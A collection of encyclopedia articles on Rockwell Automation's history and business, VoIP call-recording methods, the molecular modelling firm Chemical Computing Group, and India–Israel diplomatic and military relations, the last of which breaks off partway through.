Rockwell Automation, Inc. is an American provider of industrial automation and digital transformation. Their brands include Allen-Bradley, FactoryTalk software and LifecycleIQ Services.
Headquartered in Milwaukee, Wisconsin, Rockwell Automation employs approximately 24,500 people and has customers in more than 100 countries worldwide. The Fortune 500 company reported fiscal year 2021 global sales at $7 billion.
History
Early years
Rockwell Automation traces its origins to 1903 and the formation of the Compression Rheostat Company, founded by Lynde Bradley and Dr. Stanton Allen with an initial investment of $1000.
In 1904, 19-year-old Harry Bradley joined his brother in the business.
The company's first patented product was a carbon disc compression-type motor controller for industrial cranes. The crane controller was demonstrated at the St. Louis World's Fair in 1904.
In 1909, the company was renamed the Allen-Bradley Company.
Allen-Bradley expanded rapidly during World War I in response to government-contracted work. Its product line grew to include automatic starters and switches, circuit breakers, relays and other electric equipment.
In 1914, Fred Loock established the company's first sales office in New York.
Upon co-founder Stanton Allen's death in 1916, Lynde Bradley became president. Harry Bradley was appointed vice president and attorney Louis Quarles was named corporate secretary.
In 1918 Allen-Bradley hired its first female factory worker, Julia Bizewski Polczynski, who was promoted to foreman the following year.
During the 1920s, the company grew its miniature rheostat business to support the burgeoning radio industry. By the middle of this decade, nearly 50 percent of the company's sales were attributed to the radio department. The decade closed with record company sales of $3 million.
By 1932, the Great Depression had taken its toll and the company posted record losses. Amid growing economic pressure, Allen-Bradley reduced its workforce from 800 to 550 and cut wages by 50 percent. To lessen the financial burden, Lynde and Harry Bradley implemented a unique program: the company replaced employees’ lost wages with preferred stock. Eventually, the company bought back all stock at six percent interest.
Throughout this period, Lynde Bradley supported an aggressive research and development approach intended to "develop the company out of the Depression." Lynde Bradley's R&D strategy was successful. By 1937, Allen-Bradley employment had rebounded to pre-Depression levels and company sales reached an all-time high of nearly $4 million.
Mid-Late 20th century
Following the death of Lynde Bradley in 1942, Harry Bradley became company president and Fred Loock was promoted to vice president. The Lynde Bradley Foundation, a charitable trust, was established with Lynde Bradley's assets. The foundation's first gift of $12,500 was made to Milwaukee's Community Fund, predecessor of the United Way.
World War II fueled unprecedented levels of production, with 80 percent of the company's orders being war-related. Wartime orders were centered on two broad lines of products – industrial controls to speed production and electrical components or "radio parts" used in a wide range of military equipment.
Allen-Bradley expanded its facilities numerous times during the 1940s to meet war-time production needs. With Fred Loock serving as president and Harry Bradley as chairman, the company began a major $1 million, two-year expansion project in 1947. The company completed additional expansions at its Milwaukee facilities in the 1950s and 1960s, including the Allen-Bradley clock tower. The clock tower has since been renamed and is known today as the Rockwell Automation clock tower.
Harry Bradley died in 1965. Fred Loock retired in 1967 and died in 1973.
During the 1970s, the company expanded its production facilities and markets and entered the 1980s as a global company. With president J. Tracy O'Rourke (1981–89) at the helm, the company introduced a new line of programmable logic controllers, the PLC in 1981 followed by the PLC-2 1982) (2/30, 2/05/ 2/16&2/17) PLC-3(1982) SLC-100 Family (1986) SLC-500(1986) PLC-5 Family (1985). Earlier PLC developments were the MAC, PLC-4.
In 1985 privately owned Allen-Bradley set a new fiscal record with sales of $1 billion. On February 20, 1985, Rockwell International purchased Allen-Bradley for $1.651 billion; this was the largest acquisition in Wisconsin's history to date. For all intents and purposes, Allen-Bradley took over Rockwell's industrial automation division.
The 1990s featured continued technology development, including the company's launch of its software business, Rockwell Software (1994), the Logix control platform (1997) and the Integrated Architecture system (1999). Rockwell International developed PowerFlex, a manufacturing software and technology in the 1990s.
During this decade, Rockwell International also acquired a power systems business, composed of Reliance Electric and Dodge. These two brands, combined with control systems brands Allen-Bradley and Rockwell Software, were marketed as Rockwell Automation.
In 1998, Keith Nosbusch was named president of Rockwell Automation Control Systems. Rockwell International Corporation headquarters was moved to Milwaukee, Wisconsin the same year.
21st century
In 2001, Rockwell International split into two companies. The industrial automation division became Rockwell Automation, while the avionics division became Rockwell Collins. The split was structured so that Rockwell Automation was the legal successor of Rockwell International, while Rockwell Collins was the spin-off. Rockwell Automation retains Rockwell International's stock price history and continues to trade on the New York Stock Exchange under the symbol "ROK".
Keith Nosbusch was named chief executive officer in 2004.
In 2007, Rockwell Automation sold the Power Systems division for $1.8 billion to Baldor Electric Company to focus on its core competencies in automation and information technology.
In 2007, Rockwell Automation acquired ICS Triplex.
In April 2016, it was announced that Keith Nosbusch would be replaced by Blake Moret effective July 1, 2016. Nosbusch would remain with Rockwell Automation as chairman. Moret was previously the senior vice president of the Control Products and Solutions segment of the company.
In June 2017, Rockwell Automation and Manpower launched the Academy of Advanced Manufacturing to provide training in digital manufacturing skills for military veterans.
Effective January 1, 2018, Keith Nosbusch will step down as Chairman. Blake Moret was elected the incoming Chairman by the board of directors.
On June 11, 2018, Rockwell Automation made a $1 billion equity investment in PTC acquiring an 8.4% ownership stake.
February 2019 Rockwell Automation and Schlumberger enter joint venture to create Sensia, the oil and gas industry’s first fully Integrated automation solutions provider.
Rockwell Automation is announced as a founding member of ISA Global Cybersecurity Alliance to help advance readiness and awareness in manufacturing.
November 2019 partnership with Accenture’s Industry X.0 to help deliver greater industrial supply chain optimization.
Simulation software provider ANSYS and Rockwell Automation announce partnership to help customers design simulation-based digital twins of products, processes, and manufacturing.
November 2019 Rockwell Automation joins forces with Accenture, Microsoft, PTC, ANSYS, and EPLAN to help businesses simplify digital transformation.
Company announces restructuring into 3 operating segments, effective Oct. 1, 2020: Intelligent Devices, Software & Control, and Lifecycle Services.
In September 2020 Rockwell Automation is recognized for its culture of supporting women by the Society of Women Engineers.
PTC and Rockwell Automation announce expansion and extension of their strategic alliance.
October 2020 partnership with Microsoft announced to develop edge-to-cloud based solutions for connecting information between development, operations, and maintenance teams.
November 2020 Company announces plans to achieve a new net zero carbon neutral goal (Scopes 1 and 2) by 2030.
February 2021 Rockwell Automation announces its first Chief Diversity, Equity, and Inclusion Officer.
On Feb. 23, 2021, Rockwell Automation was recognized by Ethisphere as one of the 2021 World’s Most Ethical Companies, marking the 13th time the company received this honor.
Robot manufacturer Comau and Rockwell Automation partner to simplify robot integration for industries.
May 2021 Rockwell Automation and Cisco partner to combat rapidly evolving industrial cybersecurity threats by adding Cisco’s Cyber Vision to the LifecycleIQ Service portfolio.
Company creates new role of Chief Sustainability Officer.
September 2021 Rockwell Automation and Ansys announce partnership for enhanced Studio 5000 Simulation Interface to connect with Ansys digital twins.
On November 9, 2021, the company celebrated the opening of its 30th annual Automation Fair in Houston.
Rockwell Automation announced new partnerships with cybersecurity services leaders Dragos and CrowdStrike. The company also established a new Cybersecurity Operations Center in Israel.
Business Operations
Rockwell Automation is a global company focusing on industrial automation and digital transformation. In 2021, Rockwell Automation adjusted its organizational structure into three operating segments—Intelligent Devices, Software & Control, and Lifecycle Services.
Rockwell Automation has three primary areas of business operations:
Allen-Bradley—automated components and integrated control systems for safety, sensing, industrial control, power control and motion control.
FactoryTalk—software that supports advanced industrial applications including system design, operations, plant maintenance, and analytics.
LifecycleIQ Services—services to help connect, secure, mobilize, and scale manufacturing operations.
Acquisitions
In recent years, Rockwell Automation has grown through acquisitions of companies specializing in software services for supply chain management, systems integrators, cloud-native smart manufacturing platforms, simulation capabilities, manufacturing execution systems, and cybersecurity services.
2019
MESTECH Services – Provider of Manufacturing Execution Systems (MES)/Manufacturing Operations Management (MOM), digital solutions consulting, and systems integration services.
Emulate3D – Software developer for simulating and emulating industrial automation systems.
2020
Fiix – Provider of artificial intelligence-enabled computerized maintenance management systems.
Oylo – Provider of industrial control system (ICS) cybersecurity services including assessments, turnkey implementations, managed services, and incident response.
Kalypso – Software delivery and consulting firm specializing in digital transformation for industrial companies.
ASEM – Provider of digital automation technologies including industrial PCs, HMI software and hardware, remote access and secure industrial IoT gateway solutions.
Avnet – Provider of IT/OT cybersecurity services and solutions including assessments, penetration testing, network & security solutions, and training for converged IT/OT managed services.
2021
AVATA – Services provider for supply chain management, enterprise resource planning, and company performance management.
Plex Systems – Cloud-native smart manufacturing platform operating at scale, including advanced Manufacturing Execution Systems (MES), quality and supply chain management capabilities.
Notable distinctions
In 2020 it was named to the Newsweek America’s Most Responsible Companies list.
In 2021 Rockwell was named to the FTSE4Good Index Series for the 20th time. The Index is designed to measure the performance of companies demonstrating strong Environmental, Social, and Governance (ESG) practices.
Also, in 2021 the company was listed on the Dow Jones Sustainability Indices for the 11th time. The pioneering series of global sustainability benchmarks is composed of global, regional, and country leaders annually assessed on long-term governance and economic, environmental, and social criteria.
In 2021 Rockwell was named to Barron’s 100 Most Sustainable Companies list and ranked among the top five companies in the Leading Climate Aligned Companies category.
See also
Allen-Bradley
Allen-Bradley Clock Tower
Engineer In Training (EIT) Program
Programmable Logic Controller
Retro-Encabulator, fictional Rockwell Automation device
References
External links
Rockwell Automation
Rockwell Software
Allen-Bradley
Sustainability Report
Company blogs
Case studies
Podcasts
The Journal
Companies listed on the New York Stock Exchange
Technology companies established in 1903
Manufacturers of industrial automation
Manufacturing companies based in Milwaukee
MES software
1903 establishments in Wisconsin
Electric motor manufacturers
|
8409909
|
https://en.wikipedia.org/wiki/VoIP%20recording
|
VoIP recording
|
Voice over Internet Protocol (VoIP) recording is a subset of telephone recording or voice logging, first used by call centers and now being used by all types of businesses. There are many reasons for recording Voice over IP call traffic such as: reducing company vulnerability to lawsuits by maintaining recorded evidence, complying with telephone call recording laws, increasing security, employee training and performance reviews, enhancing employee control and alignment, verifying data, sharing data as well as customer satisfaction and enhancing call center agent morale.
Operation
By definition, Voice over IP is audio converted into digital packets and then converted to IP packets. VoIP recording is accomplished either by sniffing the network or by having the packets duplicated and directed to the recorder—passive recording or active recording, respectively.
Sniffing (passive recording) is done by connecting to the SPAN (Switched Port ANalyzer) port which allows the VoIP recording unit to monitor all network traffic and pick out only the VoIP traffic to record by either MAC address or by IP address. This is usually done by connecting an Ethernet cable being between the VoIP recording unit and the router, switch, or hub. Via the SPAN port, the recorder will "sniff" for signaling and RTP (Real Time Protocol) packets that have the identifying information contained in the headers of the packets is designated to record. There are two main ways to capture the RTP packets with the SPAN port. One can SPAN the VoIP Gateway port, giving all the in/out bound traffic and offers one point of contact for recording. This is especially helpful in a campus with phones in multiple locations across the campus. However, this method cannot capture internal, peer-to-peer (phone to phone) calls because their VoIP traffic is sent directly between the phones and doesn't flow through the gateway port.
Duplication and redirection requires setting up a VLAN (Virtual LAN) and including all the phones within the VLAN. Then SPAN that VLAN. This will allow recording all in/out bound traffic and internal traffic. The disadvantage is that not all phones at times are on a VLAN or the same VLAN, so multiple SPANS are needed. Another method is to use a concept called RSPAN (remote SPAN), in which the VLAN's that are set to SPAN are trunked across switches to a receiving switch.
Challenges
VoIP is usually implemented as a cost-saving measure over POTS (Plain old telephone systems). The same holds true now for VoIP recording. Most recording vendors are able to record the various standards of VoIP such as G.711, G.729a/b and G.723 and software-only solutions as compared to the intensive hardware and software associated with legacy PBX recording.
Today, most of the VoIP vendors are offering VoIP recording methods specific to their VoIP call and communications management servers. These vendors are offering what is referred to as active VoIP recording where the recording vendor's solution becomes an "active" participant within the call for recording purposes. This approach offers some benefits over the long established method of sniffing (Passive) recording in environments where the handsets to be recorded are off site or in remote locations, or in situations where the network routing would mean that a passive solution would be overcomplicated. It also greatly simplifies recording internal calls, as it no longer necessary to duplicate the audio streamed between two handsets to the voice recorder as the telephony system will automatically manage this in any solution.
Disadvantages of "active" call recordings can include overheads on the PBX, the need for agent interaction and changes to the quality of the call. "Passive" call-recording software works by using packet filter technology to listen for VoIP calls on the LAN on a monitored port. The RTP stream is then captured and converted to a WAV file for storage and retrieval.
Other methods
VoIP calls can be recorded via streaming audio recording applications. Most call centers and other organizations required to record calls would more often use a recording system offered by the softphone or IP PBX. Streaming audio recorders can be useful for home-based recording.
See also
Telephone tapping
References
Call-recording software
Voice over IP
Surveillance
Privacy of telecommunications
Communication software
|
12593908
|
https://en.wikipedia.org/wiki/Chemical%20Computing%20Group
|
Chemical Computing Group
|
Chemical Computing Group is a software company specializing in research software for computational chemistry, bioinformatics, cheminformatics, docking, pharmacophore searching and molecular simulation. The company's main customer base consists of pharmaceutical and biotechnology companies, as well as academic research groups. It is a private company that was founded in 1994; it is based in Montreal, Quebec, Canada. Its main product, Molecular Operating Environment (MOE), is written in a self-contained programming system, the Scientific Vector Language (SVL).
Products
MOE (Molecular Operating Environment)
MOE is a drug discovery software platform that integrates visualization, modeling, and simulations, as well as methodology development. MOE scientific applications are used by biologists, medicinal chemists and computational chemists in pharmaceutical, biotechnology and academic research. MOE runs on Windows, Linux, Unix, and MAC OS X.
Main application areas: Structure-Based Design, Fragment-Based Design, Pharmacophore Discovery, Medicinal Chemistry Applications, Biologics Applications, Protein and Antibody Modeling, Molecular Modeling and Simulations, Cheminformatics & QSAR
PSILO: A Protein Structure Database System
PSILO is a protein structure database system that provides a repository for macromolecular and protein-ligand structural information. It allows research organizations to track, register and search both experimental and computational macromolecular structural data. A web-browser interface facilitates the searching and accessing of public and private structural data.
See also
Other institutions developing software for computational chemistry:
Accelrys
BioSolveIT
Cresset Biomolecular Discovery
Desert Scientific Software
Inte:Ligand
MolSoft
OpenEye Scientific Software
Pharmacelera
Schrödinger
VLifeMDS Software
NovaMechanics Ltd Cheminformatics Solutions
References
External links
Excellence Award for student posters at ACS National Meetings
Review of MOE 2005.06
Molecular fingerprints in MOE
Discussion of Binary QSAR: Jürgen Bajorath (2004), Chemoinformatics: Concepts, Methods, and Tools for Drug Discovery page 92
Research support companies
Software companies of Canada
Companies based in Montreal
Molecular modelling software
|
7199609
|
https://en.wikipedia.org/wiki/India%E2%80%93Israel%20relations
|
India–Israel relations
|
India–Israel relations (; ) refer to the bilateral relations between the Republic of India and the State of Israel. The two countries have an extensive and comprehensive economic, military, and political relationship.
Israel is represented through an embassy in New Delhi and consulates in Mumbai and Bangalore; India is represented through an embassy in Tel Aviv.
India is the largest buyer of Israeli military equipment and Israel is the second-largest supplier of military equipment to India after Russia. From 1999 to 2009, military business between the two nations was worth around . Military and strategic ties between the two nations extend to intelligence-sharing on terrorist groups and joint military training.
, India is the third-largest Asian trade partner of Israel, and its tenth-largest trade partner overall; bilateral trade, excluding military sales, stood at . Relations further expanded during Indian Prime Minister Narendra Modi's administration, with India abstaining from voting against Israel in several United Nations resolutions. , the two nations are negotiating an extensive bilateral free-trade agreement, focusing on areas such as information technology, biotechnology and agriculture.
According to an international poll conducted in 2009, 58 percent of Indians expressed sympathy with Israel with regards to the Arab–Israeli conflict, compared to 56 percent of Americans.
History
Ancient relations
Excavation at Tel Megiddo shows evidences of Indo-Mediterranean trade relations from mid second millennium BCE between south Asia and southern Levant as they prove presence of turmeric, banana, sesame, all originating from south Asia. Geographical analysis of Israel suggests that the authors of Old Testament were talking about India, where the trade of animals such as monkeys and peacocks existed. According to Chaim Menachem Rabin, the connection between ancient Israel and the Indian subcontinent was recorded during the reign of King Solomon (10th century BCE) in I Kings 10.22. Ancient trade and cultural communication between India and the Levant is documented in the Periplus of the Erythraean Sea and the accounts surrounding Queen of Sheba in the Hebrew Bible. Jews who have settled in Kochi, Kerala, trace their origin back to the time of King Solomon and are called Cochin Jews. Later on, Paradesi Jews migrated to Kochi, Kerala, during the 15th and 16th centuries following the expulsion of Jews from Spain.
The trade relations of both communities can be traced back to 1,000 BCE and earlier to the time of the Indus valley civilization of the Indian subcontinent and the Babylonian culture of Middle East. A Buddhist story describes Indian merchants visiting Baveru (Babylonia) and selling peacocks for public display. Similar, earlier accounts describe monkeys exhibited to the public. Trade connections between India and Palestine and Mediterranean Jewish communities continued, and later, the languages of these cultures started to share linguistic similarities.
Judea played a minor role in trade between the Roman Empire and India during the period of Roman rule in Judea. It is known that there were expensive garments in the Temple in Jerusalem imported from India via Alexandria.
Non-recognition period (1948–1950)
India's position on the establishment of the State of Israel was affected by many factors, including India's own partition on religious lines, and India's relationship with other nations. Indian independence leader Mahatma Gandhi believed the Jews had a good case and a prior claim for Israel, but opposed the creation of Israel on religious or mandated terms. Gandhi believed that the Arabs were the rightful occupants of Palestine, and was of the view that the Jews should return to their countries of origin. Albert Einstein wrote a four-page letter to Jawaharlal Nehru on June 13, 1947, to persuade India to support the setting up of a Jewish state. Nehru, however, couldn’t accept Einstein’s request, and explained his dilemma stating that national leaders have to “unfortunately” pursue policies that are “essentially selfish”. India voted against the Partitioning of Palestine plan of 1947 and voted against Israel's admission to the United Nations in 1949. Various proponents of Hindu nationalism supported or sympathised with the creation of Israel. Hindu Mahasabha leader Vinayak Damodar Savarkar supported the creation of Israel on both moral and political grounds, and condemned India's vote at the UN against Israel. Rashtriya Swayamsevak Sangh leader Madhav Sadashiv Golwalkar admired Jewish nationalism and believed Palestine was the natural territory of the Jewish people, essential to their aspiration for nationhood.
Informal recognition (1950–1991)
On 17 September 1950, India officially recognised the State of Israel. Following India's recognition of Israel, Indian Prime Minister Jawaharlal Nehru stated, "we would have [recognised Israel] long ago, because Israel is a fact. We refrained because of our desire not to offend the sentiments of our friends in the Arab countries." In 1953, Israel was permitted to open a consulate in Bombay (now Mumbai). However, the Nehru government did not want to pursue full diplomatic relations with Israel as it supported the Palestinian cause, and believed that permitting Israel to open an embassy in New Delhi would damage relations with the Arab world.
From India's recognition of Israel in 1950 to the early 1990s, the relationship remained informal in nature. Israel supported India during the Indo-Pakistani War of 1971. India's opposition to official diplomatic relations with Israel stemmed from both domestic and foreign considerations. Domestically, politicians in India feared losing the Muslim vote if relations were normalised with Israel.
Additionally, India did not want to jeopardise the large amount of its citizens working in Arab States of the Persian Gulf, who were helping India maintain its foreign-exchange reserves. India's domestic need for energy was another reason for the lack of normalisation of ties with Israel, in terms of safeguarding the flow of oil from Arab nations. India's foreign policy goals and alliances also proved problematic to formal relations with Israel, including India's support for the pro-Palestine Liberation Organization Non-Aligned Movement, India's tilt towards the Soviet Union during the Cold War, and India's desire to counter Pakistan's influence with the Arab states. On an ideological level, the dominant political party in India during this era, namely the Indian National Congress, opposed Israel due to their perception that it was a state based on religion, analogous to Pakistan.
Although there was no formal relationship for several decades, meetings and cooperation took place between both countries, including figures such as Moshe Dayan. Israel also provided India with crucial information during its multiple wars.
Rapprochement and full recognition (1992–present)
After decades of non-aligned and pro-Arab policy, India formally established relations with Israel when it opened an embassy in Tel Aviv in January 1992. Ties between the two nations have flourished since, primarily due to common strategic interests and security threats. In 1999 Israel supported India in Kargil war by providing arms and ammunitions. The formation of Organisation of Islamic Cooperation (OIC), which allegedly neglected the sentiments of Indian Muslims, and the blocking of India by Pakistan from joining the OIC are considered to be the causes of this diplomatic shift. On a diplomatic level, both the countries have managed to maintain healthy relations despite India's repeated strong condemnations of Israeli military actions in Palestinian territories, which are believed by analysts to be motivated by the United Progressive Alliance (UPA) government's desire for Muslim votes in India.
At the height of the tension between Israel and Hamas in July 2014, India offered a rhetorical condemnation holding both sides responsible for erupting violence and asked Israel to stop "disproportionate use of force" in Gaza which was read by many as departure from tradition of more vocal supports for the Palestinian cause. External Affairs Minister Sushma Swaraj insisted that "there is absolutely no change in India's policy towards Palestine, which is that we fully support the Palestinian cause while maintaining good relations with Israel." clarifying India's current position on the issue. While that might sound to some like fence-sitting, it is a policy shared by all Indian governments over the past 20 years following the establishment of formal diplomatic relation in 1992. Swaraj, a seasoned parliamentarian, had herself blocked the opposition demand in Rajya Sabha for passing a resolution condemning Israel for 2014 Israel-Gaza conflict by saying that "India has friendly relation with both Israel and Palestine and therefore any such move may impact its friendship negatively". Although later in a symbolic gesture India joined others BRICS nations in voting at the United Nations Human Rights Council for a probe into the alleged human rights violation in Gaza, which generated mixed response among media and analysts in India. When the UNHRC report alleging that Israel had committed war crimes was tabled for vote, India abstained from voting, one of five countries to do so. 41 nations voted in favour, and the United States was the only vote against. Israeli envoy to India Daniel Carmon thanked India for not supporting what he described as "another anti Israel bashing resolution".
India–Israel relationship has been very close and warm under the premiership of Narendra Modi since 2014. In 2017, he was the first ever Prime Minister of India to visit Israel. India was the largest arms customer of Israel in 2017. Defence relations between the two countries are longstanding.
India voted in favour of Israel's resolution to deny observer status to Palestinian non-governmental organization Shahed at the UN Economic and Social Council (ECOSOC) on 6 June 2019.
Diplomatic visits
1997
Ezer Weizman became the first Israeli President to visit India in 1997.
2000
In 2000, L.K Advani became the first Indian minister to visit the state of Israel
Later that year, Jaswant Singh became the first Indian Foreign Minister to visit Israel. Following the visit, the two countries set up a joint anti-terror commission. The foreign ministers of the two countries said intensified co-operation would range from counter-terrorism to information technology.
2003
In 2003, Ariel Sharon was the first Israeli Prime Minister to visit India. He was welcomed by the Bharatiya Janata Party (BJP) led National Democratic Alliance coalition government of India. Several newspapers expressed positive views on his visit, and Indian Prime Minister Atal Bihari Vajpayee voiced confidence that Sharon's visit would pave the way for further consolidating bilateral ties. Sharon's visit was condemned in leftist and Muslim circles. Hundreds of supporters of India's various communist parties rallied in New Delhi while nearly 100 Muslims were arrested in Mumbai. Students of Aligarh Muslim University demanded that India sever ties with Israel and increase ties with Palestine. The Hindi-language daily Navbharat Times called Sharon "an important friend of India." The Hindu nationalist Rashtriya Swayamsevak Sangh (RSS) condemned the protest against Sharon. Sharon expressed satisfaction over his talks with Indian leaders. Indian Prime Minister Atal Bihari Vajpayee said the visit would increase ties between India and Israel. Sharon invited Vajpayee to visit Israel. Sharon said that Israelis "regard India to be one of the most important countries in the world," and Vajpayee was sure that Sharon's visit would bring the two countries closer together.
2006
In early 2006 Indian government ministers Sharad Pawar, Kapil Sibal and Kamal Nath visited Israel. Gujarat Chief Minister, Narendra Modi visited Israel in October 2006.
2012
Despite "India's unwavering support for the Palestinian cause", Foreign Minister SM Krishna made a two-day visit to Israel in 2012. The Israeli PM deemed this visit by Krishna a historical step forward in developing the relations between the two nations.
2014
In May 2014 after victory of Narendra Modi in 2014 general election Israeli PM Benjamin Netanyahu personally congratulated Modi. Modi in turn met his Israeli counterpart Benjamin Netanyahu in New York City on the sideline of the UN General Assembly during his US visit in 2014. This was the first meeting between the Prime Ministers of the two countries in over a decade. On the occasion of the Hanukkah festival, Indian PM Modi greeted his Israeli counterpart in Hebrew on Twitter while the Israeli PM replied in Hindi.
Indian Home Minister Rajnath Singh visited Israel in November 2014 to observe the country's border security arrangements. During his tour he also met Israeli PM Netanyahu. Breaking from convention, Singh was the first Indian minister to visit Israel without also visiting Palestine on the same trip. In the same year, former Israeli President Shimon Peres visited India. A high level Israeli delegation with the Agriculture Minister of Israel, Yair Shamir, also participated in the Vibrant Gujarat summit in 2015. In December 2014, a news article was published in The Hindu which stated that "India may end support to Palestine at UN".
2015
In February 2015 Israeli Defence Minister Moshe Ya'alon came to India. During his visit he participated in Aero India 2015. He also met his Indian counterpart, as well as the Indian PM. Pranab Mukherjee became the first President Of India to visit Israel from October 13 to 15, 2015. Mukherjee was given the rare honour of addressing the Knesset.
2016
Foreign Minister Sushma Swaraj visited Israel in January 2016. During the visit, she visited the Yad Vashem Holocaust Memorial in Jerusalem, and met with Prime Minister Benjamin Netanyahu, President Reuven Rivlin, members of the cabinet, and the Indian Jewish communities in Israel.
In September 2016, Indian Minister of Agriculture, Radha Mohan Singh visited Israel to bolster India-Israel agricultural ties. He met his Israeli counterpart Uri Ariel, where the discussion concerned about collaborative opportunities in agriculture between both the countries.
Israeli President Reuven Rivlin visited India for a week-long state visit in November 2016, becoming the second Israeli President to visit the country. Rivlin visited New Delhi, Agra, Karnal, Chandigarh and Mumbai. He spent the last day of his visit in Mumbai paying homage to the victims of the 2008 Mumbai attacks, and meeting with the Indian Jewish community. Israel currently regards Iran as a major threat to its national security, and Rivlin expressed this concern in meetings with Prime Minister Modi. Following his visit, Rivlin told Israel media that despite growing economic ties with both countries, the Indian government had assured him that India would support Israel despite the former's relations with Iran. Rivlin told The Jerusalem Post, "They assure us that when the time will come they will never, never, ever let anyone [act against] the existence of Israel."
Official state visits
Narendra Modi's visit to Israel (2017)
In July 2017, Narendra Modi became the first ever Indian Prime Minister to visit Israel. It was noted that Prime Minister Modi did not visit Palestine during the trip, breaking from convention. With the sole exception of Union Minister Rajnath Singh, previous trips by Indian ministers and President Mukherjee included visits to both Israel and Palestine. The Indian media described the move as the "dehyphenation" of India's relations with the two states.
As a personal gesture, Israel named a new type of Chrysanthemum flower, after Narendra Modi. The media houses of both countries had termed the visit to be 'historic', where India had finally brought its relations with Israel out of the closet. During the visit, India and Israel signed 7 MoUs, which are listed as below:
MoU for setting up of India-Israel Industrial Research and Development and Technological Innovation Fund (I4F)
MoU for Water Conservation in India
MoU on State Water Utility Reform in India
India-Israel Development Cooperation – 3-year work program in Agriculture 2018–2020
Plan of cooperation regarding atomic clocks
MoU regarding cooperation in GEO-LEO optical link
MoU regarding cooperation in Electric Propulsion for Small Satellites
India and Israel also signed an agreement, upgrading their bilateral relations to a 'strategic partnership'. During the trip, Prime Minister Modi also addressed the Indian diaspora in Israel in a highly televised event in Tel Aviv. In illustrating an Indian welcome to the Indian diaspora from its homeland, he announced Overseas Citizenship of India cards for Jews of Indian origin who had completed their compulsory military service in the Israel Defense Force and also pledged the construction of a major Indian cultural centre in Tel Aviv. Modi also visited the northern Israeli city of Haifa, where he paid homage to the Indian soldiers of the Indian Army who had fallen to save Jewish land in the Battle of Haifa, and unveiled a special plaque commemorating the steadfast military leadership of Major Dalpat Singh who liberated the ancient city from the Ottoman Empire.
Benjamin Netanyahu's visit to India (2018)
In January, to commemorate 25 years of Indian-Israeli relations, a highly televised visit of the Israeli Prime Minister, Benjamin Netanyahu to India took place, during which both Netanyahu and India's Prime Minister Modi have exchanged mutual applauses. This visit was the first since the 2003 visit of Ariel Sharon to India. Netanyahu, accompanied by a 130-member delegation, the largest that has ever accompanied a visiting Israeli premier, wants to increase exports to India by 25 percent over the three years. Israel is to invest $68.6 million in areas such as tourism, technology, agriculture and innovation over a period of four years, a senior Israeli official had said ahead of the visit.
During this visit, an official commemoration ceremony took place, that honoured the Indian soldiers who perished in the Battle of Haifa during World War I took place, where Teen Murti Chowk, representing the Hyderabad, Jodhpur and Mysore lancers, was renamed 'Teen Murti Haifa Chowk', after the Israeli port city of Haifa. During the official visit by the Israeli Prime Minister, the two countries signed 9 MoUs in the fields of cybersecurity, oil & gas production, air transport, homeopathic medicine, film production, space technology and innovation, he also met with the heads of the Bollywood Movie Industry. Netanyahu's Indian visit also included effort to revive Rafael missiles for delhi. Netanyahu was also the guest of honour, and delivered the inaugural address in India's annual strategic and diplomatic conference, Raisina Dialogue, where he highlighted various aspects of Israel's success story as a high-tech and innovation-based economy, and also spoke about challenges plaguing the Middle East, while expressing hope and optimism for the future of his country's relations with India. Notable leaders who attended his conference included Narendra Modi, Sushma Swaraj, former Afghan President Hamid Karzai, Indian Minister of State M J Akbar and Indian National Congress leader Shashi Tharoor. Netanyahu 's son Yair Netanyahu was supposed to accompany the Israeli Premiere on Indian state visit but only a week prior to the visit a scandalous recording about Yair's private visit to a strip club with his friends was disclosed on Israel Television News main broadcast.
Military and strategic ties
New Delhi found in the Defense industry of Israel a useful source of weapons, one that could supply it with advanced military technology. Thus was established the basis of a burgeoning arms trade, which reached almost $600 million in 2016, making Israel the second-largest source of defense equipment for India, after Russia.
India and Israel have increased co-operation in military and intelligence ventures since the establishment of diplomatic relations. The rise of Islamic extremist terrorism in both nations has generated a strong strategic alliance between the two. In 2008, India launched a military satellite TecSAR for Israel through its Indian Space Research Organisation.
In 1996, India purchased 32 IAI Searcher unmanned aerial vehicles (UAVs), Electronic Support Measure sensors and an Air Combat Manoeuvering Instrumentation simulator system from Israel. Since then Israel Aerospace Industries (IAI) has serviced several large contracts with the Indian Air Force including the upgrading of the IAF's Russian-made MiG-21 ground attack aircraft and there have been further sales of unmanned aerial vehicles as well as laser-guided bombs.
In 1997, Israel's President Ezer Weizman became the first head of the Jewish state to visit India. He met with Indian President Shankar Dayal Sharma, Vice President K R Narayanan and Prime Minister H D Deve Gowda. Weizman negotiated the first weapons deal between the two nations, involving the purchase of Barak 1 vertically-launched surface-to-air (SAM) missiles from Israel. The Barak-1 has the ability to intercept anti-ship missiles such as the Harpoon. The purchase of the Barak-1 missiles from Israel by India was a tactical necessity since Pakistan had purchased Lockheed P-3 Orion maritime surveillance aircraft and 27 Harpoon sea-skimming anti-ship missiles from the United States. Israel was one of the selected few nations, a group that also included France and Russia, that did not condemn India's 1998 Pokhran-II nuclear tests.
In 1999, Israel supported India in Kargil war by providing arms and ammunitions.
In 2000, Israeli submarines reportedly conducted test launches of cruise missiles capable of carrying nuclear warheads in the waters of the Indian Ocean, off the Sri Lankan coast. In naval terms, Israel sees great strategic value in an alliance with the Indian Navy, given India's naval dominance of South Asian waters and Indian Ocean at large. Due to the great importance of maritime trade to the Israeli economy it thus sees the potential of establishing a logistical infrastructure in the Indian Ocean with the help of the Indian Navy.
India purchased three Phalcon AWACS, fitted with IAI radar equipment mounted on Russian IL-76 transport aircraft, in 2003 at cost of $1 billion.
India purchased 50 Israeli drones for $220 million in 2005. India was considering buying the newer Harop drone. India is also in the process of obtaining missile-firing Hermes 450s.
Israel Aerospace Industries Ltd signed a US$2.5 billion deal with India in 2007 to develop an anti-aircraft system and missiles for the country, in the biggest defence contract in the history of Israel at the time. IAI CEO Yitzhak Nissan visited India to finalise the agreement with heads of the defence establishment and the country's president. IAI is developing the Barak 8 missile for the Indian Navy and Indian Air Force which is capable of protecting sea vessels and ground facilities from aircraft and cruise missiles. The missile has a range of over 70 kilometres. The missile will replace the current obsolete Russian system used by India.
On 10 November 2008, Indian military officials visited Israel to discuss joint weapons development projects, additional sales of Israeli equipment to the Indian military, and anti-terrorism strategies. The new round of talks was seen as a significant expansion in the Indian-Israeli strategic partnership.
Following the 2008 Mumbai attacks, Israel offered a team of about 40 special-operations forces and assistance in investigations. Tzipi Livni said: "If they need us we will help where needed". Magen David Adom dispatched a team of paramedics, medics and other professionals to assist with rescue efforts in the wake of the attacks. Israeli newspapers reported that the Manmohan Singh government turned down an offer by Defense Minister Ehud Barak to send counter-terrorist units to help fight the attackers.
